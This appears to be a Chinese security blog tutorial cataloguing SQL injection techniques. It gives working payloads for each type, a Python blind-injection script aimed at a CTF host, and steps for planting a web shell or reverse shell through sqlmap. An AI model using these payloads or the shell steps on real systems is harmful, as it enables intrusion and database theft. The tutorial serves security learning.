常见SQL注入类型 2020-10-04

最新推荐文章于 2024-05-19 17:35:33 发布
最新推荐文章于 2024-05-19 17:35:33 发布
阅读量326 收藏 4
点赞数 1
分类专栏: web安全 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lelouch_E/article/details/108920102
版权

常见SQL注入类型

最基础的注入-union注入攻击

  1. 判断是get型还是post型注入;

  2. 找到正确的闭合规则;

  3. order by 查询字段数;

  4. union select 1,2…# 查询显示位是第几位,没有的话就试试把id=1显示位让出,令id=-1;

  5. 获取数据库名:
    -1’ union select 1,database(),3#
    在这里插入图片描述

  6. 获取表名:
    -1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“news”#
    在这里插入图片描述

  7. 获取列名:
    -1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“serect_table”#
    在这里插入图片描述

  8. 读数据:
    -1’ union select 1,fl4g,3 from secret_table#
    在这里插入图片描述

Boolean注入攻击-布尔盲注

  1. 查看现象,能报错,但没有报错信息,正确查询也显示不了查询内容就属于布尔盲注,只存在两种状态,对或错;
  2. 由页面的两种不同返回的状态来判定我们的闭合规则;
  3. 为了方便,我们这里假设返回正确用“yes”,返回错误用“no”来表示这两种状态;
  4. 找到闭合规则后,我们在闭合规则里面 and 1=1 和 and 1=2 测试,查看是否两种返回状态;
  5. 布尔盲注要用到length()和substr()语句,用两种状态来猜解数据库,表名等的长度和正确字母;
  6. 先用 and length(database())>2 来猜数据库的长度;(使用二分法)
  7. 再用 and substr(database(),1,1)=‘t’ 来确定第一个字母,可以脚本逐个判断字母,若返回yes即是;
  8. and substr(database(),2,1)=“t” 代表第二个字母;
  9. 最后结合长度,成功将数据库猜解出来;
  10. 之后类似union注入步骤;
    脚本举例:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
import requests as req
url = "http://[docker].cloudeci1.ichunqiu.com/index.php"
data = {
"username" : '''admin\\''',
"password" : ""
}
res = ""
for position in range(1,30):
for i in range(32,127):
payload = f"or/**/ascii(substr(password,{position},1))>{i}#"
data["password"] = payload
r = req.post(url=url, data=data)
if r"<div>密码错误" not in r.text:
res += chr(i)
print(res)
break
else:
continue

报错注入攻击

  1. 只要注入点有sql报错信息,那么就可以使用报错注入;
  2. 还是一样,引号报错,然后找到闭合规则,页面正常显示,则可以在闭合规则中开始写入报错注入的sql语句;
  3. updatexml报错获取当前数据库:
and updatexml (1,concat(0x7e,(select database()),0x7e),1)
  1. floor报错获取当前数据库:
and (select 1 from (select count(*),concat((database()),floor (rand(0)*2)x from info rmation_schema.tables group by x)a)
  1. 利用select语句替换掉database()来继续获取数据库中的表名,字段名,查询语句和union注入攻击的语句相同;
  2. 只不过这里不能再使用group_concat了,因为报错注入只显示一条结果,需要使用limit语句;

时间注入攻击-时间盲注

  • 没有明确的现象,不管是对是错都返回一个状态;
  • 但是如果用sleep(5)方法,能让响应时间延迟为5秒以上,那么就为时间盲注;
  • 我们用sleep(5)函数构造了一个时间延时的状态,因此,我们又有了两种状态,像布尔盲注一样可以根据这两种状态来判定数据库,表名和字段名的长度和正确的每个字母;
  • 同样的找到正确的闭合规则,当然,这个闭合规则得配合着 and sleep(5)语句来构造,哪一个闭合规则执行了sleep(5),那么就是正确的闭合规则;
  • 时间盲注配合着 if(A,B,C) 语句结合使用,含义是:如果A是true,则返回B(即执行B),否则返回C(执行C);
  • 那么判断当前数据库名长度的语句为:
      if (length (database())>1,sleep(5),1)
    如果说数据库的长度大于1,那么响应延时5秒,否则执行select 1(也就是不延时),由此来推出数据库长度。
  • 判断当前数据库名的第一个和第二个字母的语句:
    if(substr(database(),1,1)='s',sleep(5),1)
    if(substr(database(),2,1)='s',sleep(5),1)
    只有第一个字母等于26个字母中正确字符时,才会延时5秒,因此可以通过burp或者sqlmap跑。
  • 根据数据库名长度以此内推即可得出完整的数据库的库名,表名,字段名和具体内容。

堆叠查询注入攻击

  1. 可以使用堆叠注入的地方也可以使用布尔盲注和时间盲注;
  2. 同样先找出正确的闭合规则,然后也看两种状态来猜解库名,表名等;
  3. 堆叠注入的语句为
    ;select if(length(database())>1,sleep(3),1)
    ;select if(substr(database(),1,1)='r',sleep(3),1)
  4. 按照原理来说,分号后面可以执行新sql语句,但是很多时候没有必要,若遇到其他注入方法不行时可以尝试,不常用。

二次注入攻击

  • 二次注入一共有两个url,url一用来注入,也就是注入点,插入sql语句的地方,另外一个url用来返回信息;
  • 也就是url一插入了sql语句,url一的响应里面就会返回这条信息对应的id值,然后url二就传入这个新id值,然后访问,响应回来之后将会爆出sql语句查询的结果,正确或者错误的sql信息;
  • 就相当于url一是一个用户注册的地方,用户注册后会在数据库里面加入新id存放用户的注册信息,那么这个id可以传给url二来访问,url二就可以显示出用户的注册信息,但如果注册信息含有恶意sql语句,url二就会显示出敏感的数据库信息;
  • 跟union注入攻击差不多,只是回显的信息需要再另外的url中显示出来了;
  • 之后步骤同union注入常规步骤;

宽字节注入攻击

  1. 如果遇到单,双引号被转义,变成了反斜杠,导致,参数id无法逃逸单引号的包围;
  2. 一般情况下,此处是不存在sql注入漏洞的;
  3. 但是如果数据库的编码为GBK时,就可以使用宽字节注入,因此在不知道是否是GBK编码时,都可以进行尝试;
  4. 宽字节的格式是在地址后先加一个 %df,再加单引号,因为反斜杠的编码为%5c,在GBK编码中,%df%5c是繁体字“連“,因此,单引号成功逃逸,爆出sql错误;
  5. 因此构造闭合规则时,在单引号前面加上%df即可;
  6. 之后同union注入的查询语句相同;

base64 注入攻击

  • 如果遇到url的参数id的值看起来像base64的,先拿去url解码,然后如果是base64,拿去base64解码,解出来应该是id的值;
  • 那么如果对url进行sql注入测试,就需要对id后面的所有值进行base64编码;
  • 注入的方式步骤与union注入相同,只不过需进行base64编码,以及闭合规则。

cookie注入攻击-http请求头参数注入

  1. 抓包对一个url的http请求头的所有参数进行sql注入测试,里面的所有参数都有可能存在注入点,如果响应包出现sql报错,那么测试的这个参数就是注入点;
  2. 常见的http头部注入的参数有:
    【Referer】,【X-Forwarded-for】,【Cookie】,【X-Real-IP】,【Accept-Language】,【Authorization】
  3. 如果测试到cookie参数的时候,响应有报sql错误,那么就是cookie注入攻击;
  4. 和union注入的差别就在于注入点不一样,之后使用union注入的方法即可;

XFF注入攻击-http请求头参数注入

  • XFF注入即HTTP头部的X-Forwarded-for参数存在sql注入攻击;
  • 例如测试此参数的值 X-Forwarded-for:127.0.0.1’ 响应有sql报错,那么此处就是注入点;
  • 之后同union注入方法。

知道绝对路径的注入

  1. 如果通过一些方式爆出了网站的根目录,并且知道此站点存在sql注入;
  2. 猜测此数据库可能有file权限,那么我们就可以使用语句:into outfile 来写shell到网站的根目录下,之后用菜刀连接;
  3. 如果数据库没有file权限,那么我们有sqlmap的参数 --is–dba 来查看当前数据库的用户是否有管理员权限;
  4. 如果有管理员权限,我们就可以使用sqlmap里面的参数命令 --os-shell 来上传,反弹shell,最终getshell;
  5. 如果file,管理员权限都没有,那么另寻思路,日志,缓存写入等。
Lelouch_E
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MySQL注入常用函数及逻辑运算
01-20
原文地址:www.cluren.xyz MySQL注入常用函数: 函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedir 数据库安装路径 @@version_compile_os 操作系统 count() 返回执行结果数量········ concat() 没有分隔符的连接字符串 concat_ws() 含
SQL注入攻击常见类型及解决方案
逆天骚年的博客
08-26 1155
select * from test where username='张三' and password='*****' or 1='1'; 解决方案 1.使用预编译 2.改变验证数据库用户逻辑   select password from test where username='张三';      //看看有没有查询到记录 如果有说明用户存在    if(从数据库查询到的
SQL 注入类型详解
hl1293348082的专栏
03-28 2142
笔者最初学习 SQL 注入时,大家对于 SQL 注入类型的归类让我头脑一片混乱,后来笔者发现其实大家都是根据 sqlmap 上给出的“类型”来划分的。所以,今天在这里,笔者根据自己所学所知来对 SQL 注入进行一个分类,以及讲解一些在注入时十分重要而有用的知识,相信对初学者十分有用。 本文主要使用 MySQL 来进行讲解,且重点是对整个 SQL 注入类型的探讨,以及在这些注入类型中的一些重要细节的讲解,所以不会过多讲解 SQL 语句具体语法语意等。 我们知道,Sqlmap 有个参数可以直接指定注入时所用
mysql 注入用例_mysql-常用注入渗透手法
weixin_42127020的博客
01-19 229
mysql:内置函数常用函数:left(), mid(), ord(), length(),benchmark(),load_file(), outfile(),concat(),系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),ASCII码:select char(97,100...
MySQL注入 常用逻辑 学习
mikeyning的博客
07-08 140
MySQL注入 常用逻辑 学习 CentOS7 1.启动sqli-labs [root@localhost ~]# docker run -dt --name sqli -p 80:80 --rm c0ny1/sqli-labs:0.1 2.进入mysql 容器 [root@localhost ~]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS
05-浅谈企业SQL注入漏洞的危害与防御1
08-03
浅谈企业SQL注入漏洞的危害与防御——安全小课堂第五期安全小课堂第5期SQL注入攻击是一个非常传统的攻击方式,且SQL注入方式与手段变化多端。常见的注入类型有:
使用Python防止SQL注入攻击的实现示例
01-20
在所有注入类型中,SQL注入是最常见的攻击手段之一,而且是最危险的。由于Python是世界上最流行的编程语言之一,因此了解如何防止Python SQL注入对于我们来说还是比较重要的 那么在写这篇文章的时候我也是查询了国内...
计算机病毒与防护:SQL注入漏洞的利用.ppt
06-10
使用示例-使用Sqlmap获取DVWA数据 (6)判断列名:root@kali:~# sqlmap -r /etc/url -D dvwa -T users –column 单击此处添加标题 * * * * * * * * * * * * * * * * 目录页 SQL注入漏洞的利用 数据提取方式 数据提取...
sql注入系列课程
06-11
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
MySQL常用注入方式总结笔记
EC_Carrot的博客
11-10 830
目录MySQL中的注释获取元数据UNION查询MySQL函数利用MySQL显错式注入宽字节注入MySQL长字符截断延迟注入 MySQL中的注释 MySQL支持以下三种注释风格: #:注释从"#"字符到行尾 --:注释从"--"序列到行尾。需要注意用此注释后面需要跟一个或多个空格。注:空格与tag都可以 /* */:注释从/*序列到后面*/序列中间的字符 其中,/* */注释有个特点,观察以下sql语句: select id/*!55555, username*/ from users 这句语句是能正常
MySQL注入入门类型
cyjmosthandsome的博客
02-26 1305
MySQL数据库基础知识及注入   一、 网站后台的PHP代码 &lt;?php     echo "HELLO";     $id = $_GET['id'];  #$id使用GET方式传入     $conn = mysqli_connect('localhost', 'root', '913347102', 'tpshop'); #连接MySQL数据库     if(!...
2020-如何寻找SQL注入
Litbai_zhang
04-07 609
开局一张图,还不给赞
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
2401_85000826的博客
05-16 411
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
最新发布
明明如月的技术博客
05-19 142
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 435
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
红队攻防渗透技术实战流程:云安全之云服务安全:ECS和RDS
HACKONE的博客
05-18 30
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址:http://metadata.tencentyun.com/CF 云渗透框架项目:https://wiki.teamssix.com/CF/
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 369
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
sql 判断注入类型
07-25
回答: 判断SQL注入类型的方法有多种。一种常见的方法是通过输入特定的字符或语句来测试是否存在注入漏洞。例如,当输入"and 1=2"时,如果后台执行的SQL语句中包含了这个条件,并且返回了错误信息,那么就可以判断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值